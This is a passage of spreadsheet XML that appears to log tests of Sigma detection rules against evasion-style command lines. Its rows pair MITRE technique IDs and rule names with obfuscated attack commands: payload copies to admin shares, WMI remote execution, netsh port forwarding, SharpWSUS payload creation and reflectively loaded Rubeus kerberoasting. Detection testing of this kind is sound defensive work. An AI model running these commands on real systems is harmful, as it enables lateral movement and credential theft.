          <t>powershell -nOPrOFilE /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F25" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G25" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H25" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I25" s="43" t="n"/>
      <c r="J25" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K25" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" s="42">
      <c r="A26" s="36" t="inlineStr">
        <is>
          <t>t1039</t>
        </is>
      </c>
      <c r="B26" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C26" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D26" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E26" s="36" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -COmmaNd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F26" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G26" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H26" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I26" s="43" t="n"/>
      <c r="J26" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K26" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" s="42">
      <c r="A27" s="36" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B27" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C27" s="36" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D27" s="36" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E27" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -nop -"WindowStyle" Hidden -c "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c ipconfig &gt; \\127.0.0.2\ADMIN$\output.txt' -ComputerName 10.0.0.5"</t>
        </is>
      </c>
      <c r="F27" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G27" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H27" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I27" s="43" t="n"/>
      <c r="J27" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K27" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" s="42">
      <c r="A28" s="36" t="inlineStr">
        <is>
          <t>t1047</t>
        </is>
      </c>
      <c r="B28" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_impacket_lateral_movement</t>
        </is>
      </c>
      <c r="C28" s="36" t="inlineStr">
        <is>
          <t>HackTool - Potential Impacket Lateral Movement Activity</t>
        </is>
      </c>
      <c r="D28" s="36" t="inlineStr">
        <is>
          <t>10c14723-61c7-4c75-92ca-9af245723ad2</t>
        </is>
      </c>
      <c r="E28" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"NoProfile" -WInDowSTyle Hidden /"Command" "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'cmd.exe /c ipconfig &gt; \\127.0.0.2\ADMIN$\output.txt' -ComputerName 10.0.0.5"</t>
        </is>
      </c>
      <c r="F28" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G28" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H28" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I28" s="43" t="n"/>
      <c r="J28" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K28" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" s="42">
      <c r="A29" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B29" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C29" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D29" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E29" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c \"type C:\\temp\\payload.exe &gt; \\\\10.0.0.2\\Admin\payload.exe"</t>
        </is>
      </c>
      <c r="F29" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G29" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H29" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I29" s="36" t="n"/>
      <c r="J29" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K29" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" s="42">
      <c r="A30" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B30" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C30" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D30" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E30" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "[System.IO.File]::Copy('C:\temp\payload.exe', '\\10.0.0.2\C$\payload.exe')"</t>
        </is>
      </c>
      <c r="F30" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G30" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H30" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I30" s="36" t="n"/>
      <c r="J30" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K30" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" s="42">
      <c r="A31" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B31" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C31" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D31" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E31" s="36" t="inlineStr">
        <is>
          <t>powershell.exe /"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F31" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G31" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H31" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I31" s="43" t="n"/>
      <c r="J31" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K31" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="32" ht="15.75" customHeight="1" s="42">
      <c r="A32" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B32" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C32" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D32" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E32" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"Command" "(Get-Item 'C:\temp\file.txt').CopyTo('\\192.168.1.10\C$\Windows\Temp\file.txt')"</t>
        </is>
      </c>
      <c r="F32" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G32" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H32" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I32" s="43" t="n"/>
      <c r="J32" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K32" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" s="42">
      <c r="A33" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B33" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C33" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D33" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E33" s="36" t="inlineStr">
        <is>
          <t>powershell -nop /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F33" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G33" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H33" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I33" s="36" t="n"/>
      <c r="J33" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K33" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" s="42">
      <c r="A34" s="43" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B34" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C34" s="43" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D34" s="43" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E34" s="43" t="inlineStr">
        <is>
          <t>powershell -nOPrOFilE /"Command" "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F34" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G34" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H34" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I34" s="43" t="n"/>
      <c r="J34" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K34" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="35" ht="15.75" customHeight="1" s="42">
      <c r="A35" s="36" t="inlineStr">
        <is>
          <t>t1048</t>
        </is>
      </c>
      <c r="B35" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_copy_lateral_movement</t>
        </is>
      </c>
      <c r="C35" s="36" t="inlineStr">
        <is>
          <t>Copy From Or To Admin Share Or Sysvol Folder</t>
        </is>
      </c>
      <c r="D35" s="36" t="inlineStr">
        <is>
          <t>855bc8b5-2ae8-402e-a9ed-b889e6df1900</t>
        </is>
      </c>
      <c r="E35" s="43" t="inlineStr">
        <is>
          <t>powershell -"NoProfile" -COmmaNd "[System.IO.File]::Copy('C:\temp\test.txt','\\server\C$\temp\test.txt')"</t>
        </is>
      </c>
      <c r="F35" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G35" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H35" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I35" s="43" t="n"/>
      <c r="J35" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K35" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="36" ht="15.75" customHeight="1" s="42">
      <c r="A36" s="43" t="inlineStr">
        <is>
          <t>t1090</t>
        </is>
      </c>
      <c r="B36" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_port_forwarding</t>
        </is>
      </c>
      <c r="C36" s="43" t="inlineStr">
        <is>
          <t>New Port Forwarding Rule Added Via Netsh.EXE</t>
        </is>
      </c>
      <c r="D36" s="43" t="inlineStr">
        <is>
          <t>322ed9ec-fcab-4f67-9a34-e7c6aef43614</t>
        </is>
      </c>
      <c r="E36" s="43" t="inlineStr">
        <is>
          <t>netsh.exe i""nt portproxy add v4tov4 listenport=1337 connectport=1337 connectaddress=127.0.0.1</t>
        </is>
      </c>
      <c r="F36" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G36" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H36" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I36" s="43" t="n"/>
      <c r="J36" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K36" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="37" ht="15.75" customHeight="1" s="42">
      <c r="A37" s="36" t="inlineStr">
        <is>
          <t>t1210</t>
        </is>
      </c>
      <c r="B37" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_sharpwsus_wsuspendu_execution</t>
        </is>
      </c>
      <c r="C37" s="36" t="inlineStr">
        <is>
          <t>HackTool - SharpWSUS/WSUSpendu Execution</t>
        </is>
      </c>
      <c r="D37" s="36" t="inlineStr">
        <is>
          <t>b0ce780f-10bd-496d-9067-066d23dc3aa5</t>
        </is>
      </c>
      <c r="E37" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "SharpWSUS.exe c^reate /p^ayload:C:\temp\payload.exe"</t>
        </is>
      </c>
      <c r="F37" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G37" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H37" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I37" s="43" t="n"/>
      <c r="J37" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K37" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" s="42">
      <c r="A38" s="36" t="n"/>
      <c r="B38" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C38" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D38" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E38" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\temp\updater.exe k^erberoast /outfile:hashes.txt"</t>
        </is>
      </c>
      <c r="F38" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G38" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H38" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I38" s="43" t="n"/>
      <c r="J38" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K38" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" s="42">
      <c r="A39" s="43" t="n"/>
      <c r="B39" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C39" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D39" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E39" s="36" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -Encoding Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F39" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G39" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H39" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I39" s="43" t="n"/>
      <c r="J39" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K39" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" s="42">
      <c r="A40" s="43" t="n"/>
      <c r="B40" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C40" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D40" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E40" s="36" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -EncodinG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F40" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G40" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H40" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I40" s="43" t="n"/>
      <c r="J40" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K40" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" s="42">
      <c r="A41" s="43" t="n"/>
      <c r="B41" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C41" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D41" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E41" s="36" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -EnCOdinG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F41" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G41" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H41" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I41" s="43" t="n"/>
      <c r="J41" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K41" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" s="42">
      <c r="A42" s="43" t="n"/>
      <c r="B42" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C42" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D42" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E42" s="36" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -ENCoDInG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F42" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G42" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H42" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I42" s="43" t="n"/>
      <c r="J42" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K42" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" s="42">
      <c r="A43" s="43" t="n"/>
      <c r="B43" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C43" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D43" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E43" s="36" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -encoDINg Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F43" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G43" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H43" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I43" s="43" t="n"/>
      <c r="J43" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K43" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="44" ht="15.75" customHeight="1" s="42">
      <c r="A44" s="36" t="n"/>
      <c r="B44" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C44" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D44" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E44" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\temp\updater.exe k^erberoast /outfile:hashes.txt"</t>
        </is>
      </c>
      <c r="F44" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G44" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H44" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I44" s="43" t="n"/>
      <c r="J44" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K44" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" s="42">
      <c r="A45" s="43" t="n"/>
      <c r="B45" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C45" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D45" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E45" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -Encoding Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F45" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G45" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H45" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I45" s="43" t="n"/>
      <c r="J45" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K45" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" s="42">
      <c r="A46" s="36" t="n"/>
      <c r="B46" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C46" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D46" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E46" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -"Encoding" Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F46" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G46" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H46" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I46" s="43" t="n"/>
      <c r="J46" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K46" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" s="42">
      <c r="A47" s="43" t="n"/>
      <c r="B47" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C47" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D47" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E47" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -EncodinG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F47" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G47" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H47" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I47" s="43" t="n"/>
      <c r="J47" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K47" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" s="42">
      <c r="A48" s="43" t="n"/>
      <c r="B48" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C48" s="43" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D48" s="43" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E48" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -ENCoDInG Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F48" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G48" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H48" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I48" s="43" t="n"/>
      <c r="J48" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K48" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" s="42">
      <c r="A49" s="36" t="n"/>
      <c r="B49" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C49" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D49" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E49" s="43" t="inlineStr">
        <is>
          <t>$r = [System.Reflection.Assembly]::Load((Get-Content 'Rubeus.exe' -encoDINg Byte)); [Rubeus.Program]::Main('kerberoast'.Split())</t>
        </is>
      </c>
      <c r="F49" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G49" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H49" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I49" s="43" t="n"/>
      <c r="J49" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K49" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" s="42">
      <c r="A50" s="36" t="inlineStr">
        <is>
          <t>t1003</t>
        </is>
      </c>
      <c r="B50" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_rubeus</t>
        </is>
      </c>
      <c r="C50" s="36" t="inlineStr">
        <is>
          <t>HackTool - Rubeus Execution</t>
        </is>
      </c>
      <c r="D50" s="36" t="inlineStr">
        <is>
          <t>7ec2c172-dceb-4c10-92c9-87c1881b7e18</t>
        </is>
      </c>
      <c r="E50" s="36" t="inlineStr">
        <is>
          <t>copy C:\Tools\Rubeus.exe C:\Windows\Temp\not_malware.exe</t>
        </is>
      </c>
      <c r="F50" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G50" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H50" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I50" s="43" t="n"/>
      <c r="J50" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K50" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" s="42">
      <c r="A51" s="36" t="inlineStr">
        <is>
          <t>t1021</t>
        </is>
      </c>
      <c r="B51" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_priv_escalation_via_named_pipe</t>
        </is>
      </c>
      <c r="C51" s="36" t="inlineStr">
        <is>
          <t>Privilege Escalation via Named Pipe Impersonation</t>
        </is>
      </c>
      <c r="D51" s="36" t="inlineStr">
        <is>
          <t>9bd04a79-dabe-4f1f-a5ff-92430265c96b</t>
        </is>
      </c>
      <c r="E51" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c copy /Y data.txt \\.\pipe\target_pipe</t>
        </is>
      </c>
      <c r="F51" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G51" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H51" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I51" s="43" t="n"/>
      <c r="J51" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K51" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" s="42">
      <c r="A52" s="36" t="inlineStr">
        <is>
          <t>t1021</t>
        </is>
      </c>
      <c r="B52" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_priv_escalation_via_named_pipe</t>
        </is>
      </c>
      <c r="C52" s="36" t="inlineStr">
        <is>
          <t>Privilege Escalation via Named Pipe Impersonation</t>
        </is>
      </c>
      <c r="D52" s="36" t="inlineStr">
        <is>
          <t>9bd04a79-dabe-4f1f-a5ff-92430265c96b</t>
        </is>
      </c>
      <c r="E52" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c e^c^h^o data &gt; \\.\pipe\target_pipe</t>
        </is>
      </c>
      <c r="F52" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G52" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H52" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I52" s="43" t="n"/>
      <c r="J52" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K52" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="53" ht="15.75" customHeight="1" s="42">
      <c r="A53" s="36" t="inlineStr">
        <is>
          <t>t1021</t>
        </is>
      </c>
      <c r="B53" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_priv_escalation_via_named_pipe</t>
        </is>
      </c>
